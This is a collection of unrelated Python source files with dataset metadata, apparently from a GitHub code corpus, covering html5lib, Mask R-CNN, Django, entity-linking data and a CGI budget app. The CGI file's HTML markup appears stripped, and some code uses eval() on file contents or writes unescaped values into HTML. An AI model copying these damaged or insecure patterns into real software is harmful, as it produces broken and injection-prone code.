if loan_available:\n        new_loan_avail, new_loan_details = get_new_loans(response)\n\n        if new_loan_avail:\n            print(\"Sending\", service_name, \"email at\", datetime.datetime.today())\n            send_email(new_loan_details)\n\n        # Remove old loans\n        remove_old_loans(response)\n    cacheing.update_cache(rel_path, seen_loan_ids)\n\n\ndef init():\n    print(\"Initialising\", service_name, \"Script\")\n    global seen_loan_ids\n    seen_loan_ids = cacheing.init_cache(rel_path)\n\n    # Load credentials into memory\n    global harmoney_email, harmoney_pwd\n    harmoney_email, harmoney_pwd = creds_parser.get_credentials_by(service_name)\n    print(\"Finished Initialising\", service_name, \"Script\")\n\n    # Schedule tasks\n    scheduler.schedule_tasks(period, job)\n\n\ndef send_test_dict_email():\n    f = open('./samples/nz_harmoney.txt')\n    response = eval(f.read().strip())\n    new_loan_avail, new_loan_details = get_new_loans(response)\n    send_email(new_loan_details)\n    assert new_loan_avail is True and new_loan_details != []\n\n\n","repo_name":"chrisc96/P2PLendingNotifier","sub_path":"nz_harmoney.py","file_name":"nz_harmoney.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"14135781913","text":"import gettext\n_ = gettext.gettext\n\nfrom html5lib.constants import voidElements, spaceCharacters\nspaceCharacters = u\"\".join(spaceCharacters)\n\nclass TreeWalker(object):\n    def __init__(self, tree):\n        self.tree = tree\n\n    def __iter__(self):\n        raise NotImplementedError\n\n    def error(self, msg):\n        return {\"type\": \"SerializeError\", \"data\": msg}\n\n    def normalizeAttrs(self, attrs):\n        newattrs = {}\n        if attrs:\n            #TODO: treewalkers should always have attrs\n            for (namespace,name),value in attrs.iteritems():\n                namespace = unicode(namespace) if namespace else None\n                name = unicode(name)\n                value = unicode(value)\n                newattrs[(namespace,name)] = value\n        return newattrs\n\n    def emptyTag(self, namespace, name, attrs, hasChildren=False):\n        yield {\"type\": \"EmptyTag\", \"name\": unicode(name), \n               \"namespace\":unicode(namespace),\n               \"data\": self.normalizeAttrs(attrs)}\n        if hasChildren:\n            yield self.error(_(\"Void element has children\"))\n\n    def startTag(self, namespace, name, attrs):\n        return {\"type\": \"StartTag\", \n                \"name\": unicode(name),\n                \"namespace\":unicode(namespace),\n                \"data\": self.normalizeAttrs(attrs)}\n\n    def endTag(self, namespace, name):\n        return {\"type\": \"EndTag\", \n                \"name\": unicode(name),\n                \"namespace\":unicode(namespace),\n                \"data\": {}}\n\n    def text(self, data):\n        data = unicode(data)\n        middle = data.lstrip(spaceCharacters)\n        left = data[:len(data)-len(middle)]\n        if left:\n            yield {\"type\": \"SpaceCharacters\", \"data\": left}\n        data = middle\n        middle = data.rstrip(spaceCharacters)\n        right = data[len(middle):]\n        if middle:\n            yield {\"type\": \"Characters\", \"data\": middle}\n        if right:\n            yield {\"type\": \"SpaceCharacters\", \"data\": right}\n\n    def comment(self, data):\n        return {\"type\": \"Comment\", \"data\": unicode(data)}\n\n    def doctype(self, name, publicId=None, systemId=None, correct=True):\n        return {\"type\": \"Doctype\",\n                \"name\": name is not None and unicode(name) or u\"\",\n                \"publicId\": publicId,\n                \"systemId\": systemId,\n                \"correct\": correct}\n\n    def entity(self, name):\n        return {\"type\": \"Entity\", \"name\": unicode(name)}\n\n    def unknown(self, nodeType):\n        return self.error(_(\"Unknown node type: \") + nodeType)
\n\nclass RecursiveTreeWalker(TreeWalker):\n    def walkChildren(self, node):\n        raise NotImplementedError\n\n    def element(self, node, namespace, name, attrs, hasChildren):\n        if name in voidElements:\n            for token in self.emptyTag(namespace, name, attrs, hasChildren):\n                yield token\n        else:\n            yield self.startTag(namespace, name, attrs)\n            if hasChildren:\n                for token in self.walkChildren(node):\n                    yield token\n            yield self.endTag(namespace, name)\n\nfrom xml.dom import Node\n\nDOCUMENT = Node.DOCUMENT_NODE\nDOCTYPE = Node.DOCUMENT_TYPE_NODE\nTEXT = Node.TEXT_NODE\nELEMENT = Node.ELEMENT_NODE\nCOMMENT = Node.COMMENT_NODE\nENTITY = Node.ENTITY_NODE\nUNKNOWN = \"<#UNKNOWN#>\"\n\nclass NonRecursiveTreeWalker(TreeWalker):\n    def getNodeDetails(self, node):\n        raise NotImplementedError\n\n    def getFirstChild(self, node):\n        raise NotImplementedError\n\n    def getNextSibling(self, node):\n        raise NotImplementedError\n\n    def getParentNode(self, node):\n        raise NotImplementedError\n\n    def __iter__(self):\n        currentNode = self.tree\n        while currentNode is not None:\n            details = self.getNodeDetails(currentNode)\n            type, details = details[0], details[1:]\n            hasChildren = False\n            endTag = None\n\n            if type == DOCTYPE:\n                yield self.doctype(*details)\n\n            elif type == TEXT:\n                for token in self.text(*details):\n                    yield token\n\n            elif type == ELEMENT:\n                namespace, name, attributes, hasChildren = details\n                if name in voidElements:\n                    for token in self.emptyTag(namespace, name, attributes, \n                                               hasChildren):\n                        yield token\n                    hasChildren = False\n                else:\n                    endTag = name\n                    yield self.startTag(namespace, name, attributes)\n\n            elif type == COMMENT:\n                yield self.comment(details[0])\n\n            elif type == ENTITY:\n                yield self.entity(details[0])\n\n            elif type == DOCUMENT:\n                hasChildren = True\n\n            else:\n                yield self.unknown(details[0])\n\n            if hasChildren:\n                firstChild = self.getFirstChild(currentNode)\n            else:\n                firstChild = None\n\n            if firstChild is not None:\n                currentNode = firstChild\n            else:\n                while currentNode is not None:\n                    details = self.getNodeDetails(currentNode)\n                    type, details = details[0], details[1:]\n                    if type == ELEMENT:\n                        namespace, name, attributes, hasChildren = details\n                        if name not in voidElements:\n                            yield self.endTag(namespace, name)\n                    if self.tree is currentNode:\n                        currentNode = None\n                        break\n                    nextSibling = self.getNextSibling(currentNode)\n                    if nextSibling is not None:\n                        currentNode = nextSibling\n                        break\n                    else:\n                        currentNode = self.getParentNode(currentNode)\n","repo_name":"livid/v2ex-gae","sub_path":"html5lib/treewalkers/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":3095,"dataset":"github-code","pt":"53"} {"seq_id":"20975112295","text":"from aws_lambda_powertools.utilities.data_classes.api_gateway_proxy_event import APIGatewayEventRequestContext\nfrom aws_lambda_powertools import Logger\n\nfrom my_cognito_lambda.exception.error_code_enum import ErrorCodeEnum\nfrom my_cognito_lambda.exception.unauthorized_exception import UserPlatformDemoError\nfrom my_cognito_lambda.utils.conext_extractor import ContextExtractor\n\nlogger = Logger()\ncontext_extractor = ContextExtractor()\n\n\nclass AuthorizedUserValidator:\n\n    @classmethod\n    def is_authorize(cls: \"AuthorizedUserValidator\", context: APIGatewayEventRequestContext) -> str:\n        cognito_username = context_extractor.extract(context)\n        logger.info(\"> get cognito username: %s\", cognito_username)\n\n        if not cognito_username:\n            raise UserPlatformDemoError(\n                
ErrorCodeEnum.unauthorized,\n \"Unauthorized user\",\n )\n\n return cognito_username","repo_name":"grleyvaj/aws-manage-users-crud","sub_path":"api/my_lambda/utils/authorized_validator.py","file_name":"authorized_validator.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12408904068","text":"#Question 3 - Nestedn Lists\r\n\r\n#Task\r\n#Given the names and grades for each student in a class of students, \r\n#store them in a nested list and print the name(s) of any student(s) having the second lowest grade.\r\n\r\nif __name__ == '__main__':\r\n records = []\r\n for _ in range(int(input())):\r\n name = input()\r\n score = float(input())\r\n records.append([name, score])\r\n\r\n records = sorted(records, key = lambda x: x[1])\r\n second_lowest_score = sorted(list(set([x[1] for x in records])))[1]\r\n desired_records = []\r\n for stu in records:\r\n if stu[1] == second_lowest_score:\r\n desired_records.append(stu[0])\r\n print(\"\\n\".join(sorted(desired_records)))","repo_name":"Nitheesh1305/Innomatics_Internship_APR_21","sub_path":"Task - 2 (Python Programming)/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69904118569","text":"import torch\nimport src.constants as constants\n\ndef get_batch_right_predictions(outputs, y_targets):\n batch_right_predictions = 0\n\n for index, _ in enumerate(outputs):\n output = outputs[index]\n y = y_targets[index]\n\n batch_right_predictions += get_total_right_predictions(output, y)\n\n return batch_right_predictions\n\ndef get_total_right_predictions(model_output, y_target):\n total_right_predictions = 0\n\n for batch_index in range(constants.BATCH_SIZE):\n model_transposed = model_output[batch_index].transpose(0, 1)\n\n for slice_index in range(constants.SEQUENCE_LENGTH):\n model_prediction = torch.argmax(model_transposed[slice_index])\n target_prediction = y_target[batch_index][slice_index]\n\n if model_prediction == target_prediction:\n total_right_predictions += 1\n\n return total_right_predictions\n\n\ndef get_batch_note_accuracy(outputs, y_targets):\n sample_right_predictions = 0\n\n for index, _ in enumerate(outputs):\n output = outputs[index]\n y = y_targets[index]\n\n sample_right_predictions += get_total_note_accuracy(output, y)\n\n return sample_right_predictions\n\ndef get_total_note_accuracy(model_output, y_target):\n total_right_predictions = 0\n\n for batch_index in range(constants.BATCH_SIZE):\n model_transposed = model_output[batch_index].transpose(0, 1)\n\n for measure_index in range(constants.MEASURES):\n measure_start = measure_index * constants.MEASURE_LENGTH\n measure_end = (measure_index + 1) * constants.MEASURE_LENGTH\n measure_target_notes = y_target[batch_index][measure_start:measure_end]\n\n for sequence_index in range(measure_start, measure_end):\n model_prediction = torch.argmax(model_transposed[sequence_index])\n \n if (model_prediction.item() in measure_target_notes):\n total_right_predictions += 1\n\n return total_right_predictions","repo_name":"arsenaultk9/pytorch-mini-bach-nn-counterpoint","sub_path":"src/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"35489994457","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db 
import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('ct_projects', '0018_auto_20160310_1028'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='notification',\n            name='document',\n            field=models.ForeignKey(default=None, blank=True, to='ct_projects.Document', null=True),\n        ),\n        migrations.AlterField(\n            model_name='notification',\n            name='poll',\n            field=models.ForeignKey(default=None, blank=True, to='ct_projects.Poll', null=True),\n        ),\n    ]\n","repo_name":"cloudteams/CustomerPlatform","sub_path":"ct_projects/migrations/0019_auto_20160321_1200.py","file_name":"0019_auto_20160321_1200.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} {"seq_id":"36373368902","text":"#!C:\\Python27\\python\nimport cgi\nimport cgitb; cgitb.enable()\nimport datetime\nfrom controlador_usuarios import * # connection and functions for the users table\nfrom controlador_balance import * # to compute balances between income and expenses\nfrom controlador_gastos import * # connection and functions for the expenses table\n\nprint(\"Content-Type: text/html\\n\")\n\n# NOTE: the HTML markup in the print() blocks below is a partial reconstruction;\n# the original tags were lost during text extraction.\n\n# Variables of the active session\nform = cgi.FieldStorage() \nsesion = form.getfirst('Sesion','empty')\n\n# Controller object for the users table\ntabla_usuarios = ControladorUsuarios()\n\n# Get the user's name and id\ndatos = tabla_usuarios.requerirInformacionUsuario(sesion)\nid_usuario = datos[0][0]\nnombre = datos[0][3]\n\n# Controller object for the balance\nmi_balance = ControladorBalance()\n\n# Take today's date\nhoy = datetime.datetime.now()\nhoy = hoy.isoformat()\nmes = hoy[:7]\nhoy = hoy[:10] \n\n# Title and style\nprint(\"\"\"\n\t<html>\n\t<head>\n\t<title>BUDGETSOFT Principal</title>\n\t</head>\n\"\"\"\n)\n\n# Page header\nprint (\"\"\"\n\t<body>\n\t<img alt=\"Imagen\"> <!-- image source lost in extraction -->\n\t<h1>BUDGETSOFT</h1>\n\"\"\"\n)\n\n\n# Navigation bar\nprint (\"\"\"\n\t<nav>\n\t<h2>Navegacion</h2>\n\t<!-- navigation links lost in extraction -->\n\t</nav>\n\t\"\"\"\n)\n\n# Welcome message\nprint (\"\"\"\t\n\t<p>\n\t\tBienvenido, \n\"\"\"\n)\nprint(nombre + '.</p>')\n\n\n# Pie chart\nprint(\"\"\"\n<div>\n\t<h2>Balance del mes</h2>\n\"\"\")\n# Show this month's balance\nprint('<table>')\nprint('<tr>')\nprint('<th>Balance del mes</th>')\nprint('<td>')\nprint(mi_balance.obtenerBalance(id_usuario,mes + '-01',hoy))\nprint('</td></tr>')\nprint('</table>')\n\n\n# Show today's expenses\nprint (\"\"\"\n\t<div>\n\t<h2>Gastos de hoy</h2>\n\t<table>\n\t<tr>\n\t<th>Monto</th>\n\t<th>Categoria</th>\n\t<th>Fecha</th>\n\t<th>Descripcion</th>\n\t</tr>\n\"\"\"\n)\n\n# Controller object for the expenses table\ntabla_gastos = ControladorGastos()\n# Look up the user's expenses\ndatos = tabla_gastos.verGastos(id_usuario,hoy,hoy)\n\n# number of expenses today\nnum_gastos = 0\n\n# Print the results table\nfor result in datos:\n\tresultado= result.fetchall()\n\tfor registro in resultado:\n\t\tprint('<tr>')\n\t\tprint('<td>' + registro[1] + '</td>')\n\t\tprint('<td>' + registro[3] + '</td>')\n\t\tprint('<td>' + registro[4] + '</td>')\n\t\tprint('<td>' + registro[5] + '</td>')\n\t\tprint('</tr>')\n\t\tnum_gastos = num_gastos + 1\nprint('</table>')\n\n# Reminder to enter expenses\nif(num_gastos==0):\n\tprint('<p>Te recordamos que hoy no has ingresado gastos</p>')\n\nprint('</div>')\n\n\n# Function that renders the pie chart\nprint(\"\"\"\n<!-- pie chart script lost in extraction -->\n\"\"\"\n)\n ","repo_name":"stormvolt/SGPF","sub_path":"sitio_web/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"74130516647","text":"# https://github.com/google-research/google-research/tree/master/dense_representations_for_entity_retrieval/mel\nimport os\nimport sys\nimport subprocess\nimport glob\nimport tqdm\nimport json\nimport logging\nimport pandas as pd\n\n\ndef load_annotations(lang):\n    mentions = pd.read_csv(root + \"/\" + lang + \"/mentions.tsv\", sep=\"\\t\")\n    if \"qid\" in mentions:\n        mentions[\"qid\"] = mentions[\"qid\"].str[1:].astype(\"int\")\n    else:\n        import dawg\n\n        for index in glob.glob(f\"../wiki/{lang}wiki-*/index_{lang}wiki-*.dawg\"):\n            logging.info(f\"Using {index}\")\n            wm = dawg.IntDAWG().load(index)\n            mentions[\"qid\"] = mentions[\"url\"].apply(lambda x: wm.get(x[29:], -1))\n        mentions = mentions[mentions[\"qid\"] > 0]\n\n    docs = {\n        docid: open(root + \"/\" + lang + \"/text/\" + docid).read()\n        for docid in tqdm.tqdm(set(mentions[\"docid\"]), \"Loading documents\", ncols=80)\n    }\n    links = mentions.set_index(\"docid\")[[\"mention\", \"qid\"]].sort_index()\n    paragraph_annotations = {\n        (docid, doc.replace(\"\\n\", \" \")): [tuple(a) for a in links.loc[[docid]].values]\n        for docid, doc in tqdm.tqdm(\n            docs.items(), desc=\"Collecting annotations\", ncols=80\n        )\n    }\n    return paragraph_annotations\n\n\ndef run(*cmd, cwd=None):\n    with subprocess.Popen(\n        cmd, stdout=subprocess.PIPE, bufsize=1, universal_newlines=True, cwd=cwd\n    ) as p:\n        for line in p.stdout:\n            print(line, end=\"\")\n    if p.returncode:\n        raise subprocess.CalledProcessError(p.returncode, p.args)\n\n\nif __name__ == \"__main__\":\n    datasets = [\"en\", \"ar\", \"de\", \"es\", \"fa\", \"ja\", \"sr\", \"ta\", \"tr\", \"nl\"]\n    root = \"dense_representations_for_entity_retrieval/mel/mewsli-9/output/dataset/\"\n    url = \"https://github.com/google-research/google-research/trunk/dense_representations_for_entity_retrieval\"\n\n    if not os.path.exists(root):\n        os.makedirs(root)\n        run(\"svn\", \"export\", url)\n        run(\n            \"bash\",\n            \"get-mewsli-9.sh\",\n            cwd=\"dense_representations_for_entity_retrieval/mel\",\n        )\n\n    bad_ents = set()\n    for fname in sys.argv[1:]:\n        bad_ents |= set(int(l) for l in open(fname))\n    print(f\"Filtering out {len(bad_ents)} bad entities\")\n\n    if not os.path.exists(\"Mewsli-9\"):\n        os.makedirs(\"Mewsli-9\")\n    for lang in datasets:\n        print(f\"Making {lang}\")\n        annotations = load_annotations(lang)\n\n        with open(f\"Mewsli-9/{lang}.tsv\", \"w\") as fw:\n            for (code, text), ents in annotations.items():\n                ents = json.dumps({s: e for s, e in ents if e not in bad_ents})\n                print(str(code), ents, text, sep=\"\\t\", file=fw)\n","repo_name":"bennokr/minimEL","sub_path":"evaluation/make-mewsli9.py","file_name":"make-mewsli9.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"39384302142","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import OneHotEncoder\n\npd.options.mode.chained_assignment = None  # default='warn'\n\n\nclass BinningTransformer(BaseEstimator, TransformerMixin):\n\n    # set new_value to None if Pipeline contains SimpleImputer\n    # this is for absences and tardies since some students are\n    # transfer students. The placeholder in the CSV is the string \"TRANSFER\"\n    def __init__(self, bins=1):\n        self.bins = bins\n\n        if self.bins == 0:\n            raise ValueError(\"Bins cannot be set to 0\")\n\n    def fit(self, x, y=None):\n        return self\n\n    \"\"\"\n    Transforms all the values and converts strings and \"TRANSFER\" to something legitimate.\n\n    \"\"\"\n\n    def transform(self, df):\n\n        # for i in [\"A\", \"T\"]:\n        #     for j in column_list(i, 6, 9):\n        #         df[j] = df[j].apply(lambda x: int(x / self.bins))\n\n        for j in [\"A6\", \"A7\", \"A8\", \"T8\"]:\n            df[j] = df[j].apply(lambda x: int(x / self.bins))\n\n        return df\n\n\nclass CustomTransformer(BaseEstimator, TransformerMixin):\n\n    # set new_value to None if Pipeline contains SimpleImputer\n    # this is for absences and tardies since some students are\n    # transfer students. The placeholder in the CSV is the string \"TRANSFER\"\n    def __init__(self, new_value=0, bins=1, transformation=\"fixed\", using_imputer=False):\n        self.new_value = new_value\n        self.transformation = transformation\n        self.bins = bins\n        self.using_imputer = using_imputer\n\n        if self.bins == 0:\n            raise ValueError(\"Bins cannot be set to 0\")\n\n        # if np.isnan(self.new_value) and not self.using_imputer:\n        #     raise Exception(\"If new_value is nan, then an imputer must be used. If being used, set\",\n        #                     \"using_imputer to True\")\n\n    def fit(self, x, y=None):\n        return self\n\n    \"\"\"\n    Transforms all the values and converts strings and \"TRANSFER\" to something legitimate.\n\n    \"\"\"\n\n    def transform(self, df):\n\n        for i in column_list(\"A\", 6, 9):\n            if self.transformation == \"fixed\":\n                df[i] = df[i].apply(convert_absence_columns, args=(self.new_value, self.bins))\n\n            elif self.transformation == \"log\":\n                df[i] = df[i].apply(lambda j: np.log((1 + convert_absence_columns(j, self.new_value, self.bins))))\n\n            else:\n                raise Exception(\"Transformation argument was not correctly assigned.\")\n\n        return df\n\n\ndef print_scores(score_array):\n    print(\"Scores: \", score_array)\n    print(\"Score mean: \", np.mean(score_array))\n    print(\"Score variance: \", np.var(score_array))\n\n\n# easy way of accessing A_6, A_7, ... A_N columns\ndef column_list(letter, start, end):\n    return [\"%s%d\" % (letter, i) for i in range(start, end)]\n\n\ndef get_column_rates(letter, start, end):\n    return [\"%s%d_rate\" % (letter, i) for i in range(start, end)]\n\n\ndef remove_outliers(column, target, lower_bound: float = 0., upper_bound: float = 100.):\n    non_outliers = target.between(target.quantile(lower_bound), target.quantile(upper_bound))\n    count = 0\n\n    for index in range(0, len(column)):\n        if ~non_outliers[index]:\n            count += 1\n            column.drop(index, inplace=True)\n\n    print(\"%i outliers were removed\" % count)\n\n    return count\n\n\ndef convert_absence_columns(x, new_value=0, bins=1):\n    \"\"\"\n    Columns that contain \"TRANSFER\" are converted to strings, so they must be converted.\n    Also, \"TRANSFER\" cells are considered to be missing values, so they are assigned\n    to a new_value.\n    \"\"\"\n    if x != \"TRANSFER\":\n        try:\n            return np.floor(int(float(x)) / float(bins))\n        except ValueError:\n            print(\"Absence cell is neither \\\"TRANSFER\\\" nor a number.\")\n\n    elif x == \"TRANSFER\":\n        return new_value\n\n\ndef run_test(data, target, pipeline, features_=None):\n    if features_ is None:\n        features_ = [\"A6\", \"A7\", \"A8\"]\n\n    scores = -1 * cross_val_score(pipeline,\n                                  data[features_],\n                                  data[target],\n                                  cv=5,\n                                  scoring='neg_mean_absolute_error')\n    return scores\n\n\n\"\"\"\nThere are some critical preprocessing that goes on before the test split.\nAlthough it happens before the test split, they are general enough that\nit will not cause data leakage.\n\nCreating a \"AbsencesSum_HS\" column is impossible to do when working with the pipeline.\nThus, it is beyond my control. Therefore, I must transform and impute. The binning is\ndone in the Pipeline, though.\n\"\"\"\n\n\ndef create_student_data(path, lower_bound: float = 0, upper_bound: float = 0.95):\n    student_data = pd.read_csv(path)\n\n    student_data[\"AbsencesSum_HS\"] = 0\n\n    # Pipeline doesn't allow transformations on the target label\n    # so I have to do transformations outside of Pipeline in order\n    # to sum all absences in High School for each student.\n    for j in column_list(\"A\", 9, 13):\n        student_data[j] = student_data[j].apply(convert_absence_columns)\n\n    student_data[\"AbsencesSum_HS\"] = student_data[column_list('A', 9, 13)].sum(axis=1)\n\n    # because we've created the total absences in high school column\n    # we are now able to eliminate outliers in the dataset.\n    remove_outliers(student_data, student_data[\"AbsencesSum_HS\"], lower_bound, upper_bound)\n\n    pre_process = ColumnTransformer(remainder='passthrough',\n                                    transformers=[('categories',\n                                                   OneHotEncoder(),\n                                                   [\"Gender\", \"IEP/Specialized\"])])\n\n    return student_data, pre_process\n\n\n# convert strings to int type even if it's a float\ndef convert_stat(x, new_value=np.nan):\n    if not isinstance(x, int):\n\n        if not isinstance(x, float) and '.' not in x:\n            return new_value if x == \"TRANSFER\" else int(x)\n        else:\n            return new_value if x == \"TRANSFER\" else int(float(x))\n\n    else:\n        return x\n\n\ndef get_student_data(path, bin=False):\n    dataForGraph = pd.read_csv(path)\n    dataForGraph[\"Transferred\"] = dataForGraph[\"A6\"].apply(lambda x: True if x == \"TRANSFER\" else False)\n\n    chronic_threshold = 18\n\n    # convert absent and tardy columns to integers\n    for i in [\"A\", \"T\"]:\n        for j in column_list(i, 6, 13):\n            dataForGraph[j] = dataForGraph[j].apply(convert_stat)\n            # check median and mean and see what happens!\n            dataForGraph[j].fillna(dataForGraph[j].median(), inplace=True)\n\n    # chronically absent at least one grade\n    dataForGraph[\"ChronicallyAbsent_in_HS\"] = (dataForGraph[\"A9\"] >= chronic_threshold) | \\\n                                              (dataForGraph[\"A10\"] >= chronic_threshold) | \\\n                                              (dataForGraph[\"A11\"] >= chronic_threshold) | \\\n                                              (dataForGraph[\"A12\"] >= chronic_threshold)\n\n    dataForGraph['AbsentSum'] = dataForGraph[column_list('A', 6, 13)].sum(axis=1)\n    dataForGraph['TardySum'] = dataForGraph[column_list('T', 6, 13)].sum(axis=1)\n\n    # for different time periods\n    dataForGraph['AbsencesSum_MS'] = dataForGraph[column_list('A', 6, 9)].sum(axis=1)\n    dataForGraph['AbsencesSum_HS'] = dataForGraph[column_list('A', 9, 13)].sum(axis=1)\n\n    dataForGraph['TardiesSum_MS'] = dataForGraph[column_list('T', 6, 9)].sum(axis=1)\n    dataForGraph['TardiesSum_HS'] = dataForGraph[column_list('T', 9, 13)].sum(axis=1)\n\n    # Impute the reduced lunch column\n    dataForGraph[\"Student on Free or Reduced Lunch\"] = \\\n        dataForGraph[\"Student on Free or Reduced Lunch\"].apply(lambda x: \"No\" if pd.isnull(x) else x.strip())\n    print(\"Number of students on reduced lunch: {}\".format(\n        dataForGraph[dataForGraph[\"Student on Free or Reduced Lunch\"] == \"Yes\"].shape[0]))\n\n    # Impute disability column\n    dataForGraph[\"Has a Disability?\"].fillna(\"No\", inplace=True)\n    dataForGraph[\"Has_504\"] = dataForGraph[\"Has a Disability?\"].apply(lambda x: \"Yes\" if '504' in x else \"No\")\n\n    # Calculate Absence Rates\n    for k in [\"A\", \"T\"]:\n        for column_name in column_list(k, 6, 13):\n            dataForGraph[column_name + \"_rate\"] = dataForGraph[column_name] / 180\n\n    # chronically absent at least one grade\n    dataForGraph[\"ChronicallyAbsent_in_MS\"] = (dataForGraph[\"A6\"] >= chronic_threshold) | \\\n                                              (dataForGraph[\"A7\"] >= chronic_threshold) | \\\n                                              (dataForGraph[\"A8\"] >= chronic_threshold)\n\n    # BINNING\n    if bin:\n        for i in [\"A\", \"T\"]:\n            for j in column_list(i, 6, 13):\n                dataForGraph[j] = dataForGraph[j].apply(lambda x: int(x / 8))\n\n    # remove_outliers(dataForGraph, dataForGraph[\"AbsencesSum_HS\"], 0, 0.95)\n    # TODO: Check if this does anything\n    #dataForGraph.reset_index()\n\n    return dataForGraph\n","repo_name":"kevinmonisit/Research","sub_path":"model/model_setup.py","file_name":"model_setup.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"15020243091","text":"from maskrcnn_benchmark.utils.env import setup_environment  # noqa F401 isort:skip\n\nimport argparse\nimport os\nimport json\nimport tempfile\nimport numpy as np\n\nimport torch\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data import make_data_loader\nfrom maskrcnn_benchmark.engine.inference import inference\nfrom maskrcnn_benchmark.modeling.detector import build_detection_model\nfrom maskrcnn_benchmark.utils.checkpoint import DetectronCheckpointer\nfrom 
maskrcnn_benchmark.utils.collect_env import collect_env_info\nfrom maskrcnn_benchmark.utils.comm import synchronize, get_rank\nfrom maskrcnn_benchmark.utils.logger import setup_logger\nfrom maskrcnn_benchmark.utils.miscellaneous import mkdir\nfrom maskrcnn_benchmark.engine.extra_utils import coco_results_to_contest, mask_nms\nfrom maskrcnn_benchmark.utils.imports import import_file\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"PyTorch Object Detection Inference\")\n parser.add_argument(\n \"--config-file\",\n default=\"configs/e2e_ms_rcnn_R_50_FPN_1x.yaml\",\n metavar=\"FILE\",\n help=\"path to config file\",\n )\n parser.add_argument(\"--local_rank\", type=int, default=0)\n parser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n )\n\n args = parser.parse_args()\n\n num_gpus = int(os.environ[\"WORLD_SIZE\"]) if \"WORLD_SIZE\" in os.environ else 1\n distributed = num_gpus > 1\n\n if distributed:\n torch.cuda.set_device(args.local_rank)\n torch.distributed.deprecated.init_process_group(\n backend=\"nccl\", init_method=\"env://\"\n )\n\n cfg.merge_from_file(args.config_file)\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n\n save_dir = \"\"\n logger = setup_logger(\"maskrcnn_benchmark\", save_dir, get_rank())\n logger.info(\"Using {} GPUs\".format(num_gpus))\n logger.info(cfg)\n\n logger.info(\"Collecting env info (might take some time)\")\n logger.info(\"\\n\" + collect_env_info())\n\n model = build_detection_model(cfg)\n model.to(cfg.MODEL.DEVICE)\n\n output_dir = cfg.OUTPUT_DIR\n checkpointer = DetectronCheckpointer(cfg, model, save_dir=output_dir)\n _ = checkpointer.load(cfg.MODEL.WEIGHT)\n\n iou_types = (\"bbox\",)\n if cfg.MODEL.MASK_ON:\n iou_types = iou_types + (\"segm\",)\n output_folders = [None] * len(cfg.DATASETS.TEST)\n if cfg.OUTPUT_DIR:\n dataset_names = cfg.DATASETS.TEST\n for idx, dataset_name in enumerate(dataset_names):\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\", dataset_name)\n mkdir(output_folder)\n output_folders[idx] = output_folder\n data_loaders_val = make_data_loader(cfg, is_train=False, is_distributed=distributed)\n for output_folder, data_loader_val in zip(output_folders, data_loaders_val):\n _, coco_results, _ = inference(\n model,\n data_loader_val,\n iou_types=iou_types,\n box_only=cfg.MODEL.RPN_ONLY,\n device=cfg.MODEL.DEVICE,\n expected_results=cfg.TEST.EXPECTED_RESULTS,\n expected_results_sigma_tol=cfg.TEST.EXPECTED_RESULTS_SIGMA_TOL,\n output_folder=output_folder,\n maskiou_on=cfg.MODEL.MASKIOU_ON\n )\n synchronize()\n\n #############################\n # post-processing\n #############################\n paths_catalog = import_file(\n \"maskrcnn_benchmark.config.paths_catalog\", cfg.PATHS_CATALOG, True\n )\n DatasetCatalog = paths_catalog.DatasetCatalog\n\n output_results, bbox_results = coco_results_to_contest(coco_results)\n if cfg.TEST.VIZ:\n gt_path = os.path.join(DatasetCatalog.DATA_DIR,\n DatasetCatalog.DATASETS[cfg.DATASETS.TEST[0]][1])\n with open(gt_path, 'r') as f:\n gt_results = json.load(f)\n\n # mask_nms\n mmi_thresh = 0.3\n conf_thresh = 0.5 # 0.4\n for idx, (key, result) in enumerate(output_results.items()):\n print(\"[ {} ]/[ {} ]\".format(idx+1, len(output_results)))\n\n output_results[key] = mask_nms(result, result[0]['size'], mmi_thres=mmi_thresh, conf_thres=conf_thresh)\n # viz\n if cfg.TEST.VIZ:\n import cv2\n\n if not os.path.exists(cfg.VIS_DIR):\n os.mkdir(cfg.VIS_DIR)\n img_dir = os.path.join(DatasetCatalog.DATA_DIR,\n 
